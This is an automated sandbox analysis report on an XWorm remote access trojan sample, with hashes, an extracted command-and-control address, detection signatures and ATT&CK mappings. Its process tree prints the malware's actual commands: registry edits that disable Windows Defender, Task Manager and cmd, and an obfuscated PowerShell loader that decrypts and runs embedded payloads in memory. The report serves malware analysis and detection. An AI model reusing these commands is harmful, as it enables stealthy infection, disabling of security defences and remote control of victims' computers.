xworm | c77cfe0ed48c4b4fb13d843052b4e0a97d15bc98b37c0c440060b0b7de773b9a

Analysis

max time kernel
146s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2024 01:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

menu.exe
Size

312KB
MD5

a29581b945ec3726a3b8bafabb09a11c
SHA1

070bd72b18866d3e4c92e567a4ab77f63e05dcec
SHA256

c77cfe0ed48c4b4fb13d843052b4e0a97d15bc98b37c0c440060b0b7de773b9a
SHA512

d651d03019ba69c93ba38e41334fdf9782926b8d2d92e19c81f58e51943a1213cac80ef68c0ab9bb1cb0ec7d45c2622f41b8c403bc90dd72930a5f74cd1827c6
SSDEEP

6144:U580X77xbMFjAVMEKxYS0I4NzCtakMiiCLk7bEhVtXUtze5DhW:OXndMFjAVMbV0IKzCt93eEhrEQXW

Score

10^/10

xworm discovery evasion execution persistence rat trojan

Malware Config

Extracted

Family

xworm

85.209.133.220:111

Attributes

Install_directory
%Userprofile%
install_file
system.exe

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral2/memory/1208-37-0x000001A87C500000-0x000001A87C50E000-memory.dmp	disable_win_def

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/1208-27-0x000001A87BCE0000-0x000001A87BCF6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
15	1208	powershell.exe
21	1208	powershell.exe
37	1208	powershell.exe

Blocks application from running via registry modification 3 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "powershell.exe"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1208	powershell.exe

Disables Task Manager via registry modification
evasion

Disables cmd.exe use via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	menu.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\system.exe"	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133763688136927684"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	menu.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
4092	chrome.exe
4092	chrome.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe
1208	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe
Token: SeShutdownPrivilege	4092	chrome.exe
Token: SeCreatePagefilePrivilege	4092	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe
4092	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1208	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3724 wrote to memory of 3380	3724	menu.exe	83
PID 3724 wrote to memory of 3380	3724	menu.exe	83
PID 3724 wrote to memory of 3728	3724	menu.exe	84
PID 3724 wrote to memory of 3728	3724	menu.exe	84
PID 3724 wrote to memory of 2056	3724	menu.exe	86
PID 3724 wrote to memory of 2056	3724	menu.exe	86
PID 3728 wrote to memory of 3256	3728	cmd.exe	88
PID 3728 wrote to memory of 3256	3728	cmd.exe	88
PID 3256 wrote to memory of 3208	3256	net.exe	89
PID 3256 wrote to memory of 3208	3256	net.exe	89
PID 3728 wrote to memory of 1072	3728	cmd.exe	90
PID 3728 wrote to memory of 1072	3728	cmd.exe	90
PID 3728 wrote to memory of 4288	3728	cmd.exe	91
PID 3728 wrote to memory of 4288	3728	cmd.exe	91
PID 3728 wrote to memory of 4132	3728	cmd.exe	92
PID 3728 wrote to memory of 4132	3728	cmd.exe	92
PID 3728 wrote to memory of 3532	3728	cmd.exe	93
PID 3728 wrote to memory of 3532	3728	cmd.exe	93
PID 3728 wrote to memory of 100	3728	cmd.exe	94
PID 3728 wrote to memory of 100	3728	cmd.exe	94
PID 3728 wrote to memory of 1188	3728	cmd.exe	95
PID 3728 wrote to memory of 1188	3728	cmd.exe	95
PID 3728 wrote to memory of 1120	3728	cmd.exe	96
PID 3728 wrote to memory of 1120	3728	cmd.exe	96
PID 3728 wrote to memory of 3564	3728	cmd.exe	97
PID 3728 wrote to memory of 3564	3728	cmd.exe	97
PID 2056 wrote to memory of 1208	2056	cmd.exe	101
PID 2056 wrote to memory of 1208	2056	cmd.exe	101
PID 4092 wrote to memory of 4944	4092	chrome.exe	113
PID 4092 wrote to memory of 4944	4092	chrome.exe	113
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 1460	4092	chrome.exe	114
PID 4092 wrote to memory of 4620	4092	chrome.exe	115
PID 4092 wrote to memory of 4620	4092	chrome.exe	115
PID 4092 wrote to memory of 2732	4092	chrome.exe	116
PID 4092 wrote to memory of 2732	4092	chrome.exe	116

C:\Users\Admin\AppData\Local\Temp\menu.exe
"C:\Users\Admin\AppData\Local\Temp\menu.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3724
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ran.vbs"
  2⤵
  PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\load.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3728
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:3208
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
    3⤵
    PID:1072
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f
    3⤵
    - Disables cmd.exe use via registry modification
    PID:4288
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    3⤵
    PID:4132
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDrives" /t REG_DWORD /d 4 /f
    3⤵
    PID:3532
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer" /v "DisableMSI" /t REG_DWORD /d 1 /f
    3⤵
    PID:100
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:1188
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
    3⤵
    - Blocks application from running via registry modification
    PID:1120
- - C:\Windows\system32\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f
    3⤵
    - Blocks application from running via registry modification
    PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\loader.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IRcHV6wpyUlV7FCq3bjBVC6HnvFYqZVt3VMM1/rthAU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ot9DBajrhd5olnzo/saVIg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DyDjK=New-Object System.IO.MemoryStream(,$param_var); $nXYTA=New-Object System.IO.MemoryStream; $riGTr=New-Object System.IO.Compression.GZipStream($DyDjK, [IO.Compression.CompressionMode]::Decompress); $riGTr.CopyTo($nXYTA); $riGTr.Dispose(); $DyDjK.Dispose(); $nXYTA.Dispose(); $nXYTA.ToArray();}function execute_function($param_var,$param2_var){ $dwlZo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $UVtXb=$dwlZo.EntryPoint; $UVtXb.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\loader.bat';$InQWi=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\loader.bat').Split([Environment]::NewLine);foreach ($XQbNl in $InQWi) { if ($XQbNl.StartsWith(':: ')) { $WcJMs=$XQbNl.Substring(3); break; }}$payloads_var=[string[]]$WcJMs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:1208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff857decc40,0x7ff857decc4c,0x7ff857decc58
  2⤵
  PID:4944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2
  2⤵
  PID:1460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2072,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2064 /prefetch:3
  2⤵
  PID:4620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2368 /prefetch:8
  2⤵
  PID:2732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:2524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4588,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:1
  2⤵
  PID:860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3760,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
  2⤵
  PID:2176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3752,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4964 /prefetch:8
  2⤵
  PID:3332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4968 /prefetch:8
  2⤵
  PID:4720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4984 /prefetch:8
  2⤵
  PID:2764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5060,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:3356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5408,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:2
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5480,i,16691846668580184868,995816973861028886,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:4460

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
10208e5010c34319b147ec38393cc0fb

SHA1
d934850e9892a2fc4cb269097f6b5d8096747ed7

SHA256
c407271d3053ed6df0fdb84cbe7fea0672d122b499e9e213a5dbc08687428119

SHA512
28fca38b0a88b53d647fc0aba6bc5935111fffafa5169919b943d7d5caf92a1e737c68c94cb86f236bd0707265bce6dfb3cf38b56711ab75fee793866db877a9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
e579aca9a74ae76669750d8879e16bf3

SHA1
0b8f462b46ec2b2dbaa728bea79d611411bae752

SHA256
6e51c7866705bf0098febfaf05cf4652f96e69ac806c837bfb1199b6e21e6aaf

SHA512
df22f1dff74631bc14433499d1f61609de71e425410067fd08ec193d100b70d98672228906081c309a06bcba03c097ace885240a3ce71e0da4fdb8a022fc9640

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
794feb263ab7a00f21111950dceade1e

SHA1
9a2c14bdadcbd48284e60510f40442195d112492

SHA256
78e48a0d271359f6a59fd52e8adf45f737e7719373e6a4f7c10923b926f78295

SHA512
69f61b906d67e03aafec758311c4f72473c8df9196260efba6f3d1dee075871262cd5efc01aeb207c6cacdea2353d6d26f6ee3bec716c928701b31795154f83c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.83.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
